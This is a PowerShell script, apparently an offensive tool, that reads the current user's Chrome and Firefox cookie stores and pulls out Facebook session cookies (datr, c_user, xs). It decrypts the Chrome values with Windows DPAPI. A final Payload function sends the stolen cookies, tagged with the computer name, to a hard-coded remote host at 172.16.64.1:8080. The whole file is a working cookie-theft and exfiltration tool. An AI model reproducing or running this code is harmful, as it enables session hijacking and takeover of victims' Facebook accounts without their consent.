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# Instructions: import the module, then perform the commanded needed.
# Chrome Facebook cookies extraction
# Use: Get-FacebookCreds [path to Login Data]
# Path is optional, use if automatic search doesn't work
function Get-FacebookCreds-Firefox() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 24
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
# $datr = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, c_user size is 15
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
# $c_user = $PwdMatches.groups[1]
# First the magic bytes for the facebook string, xs size is 44
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
# $xs = $PwdMatches.groups[1]
"Firefox ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Get-FacebookCreds-Chrome() {
Param(
[String]$Path
)
if ([String]::IsNullOrEmpty($Path)) {
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
}
if (![system.io.file]::Exists($Path))
{
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
Break
}
Add-Type -AssemblyName System.Security
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
$BinaryText = $StreamReader.ReadToEnd()
$StreamReader.Close()
$Stream.Close()
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
$PwdMatches = $PwdRegex.Matches($BinaryText)
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
"Chrome ---> "
"datr is $datr ###"
"c_user is $c_user ###"
"xs is $xs ###"
}
function Payload() {
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
}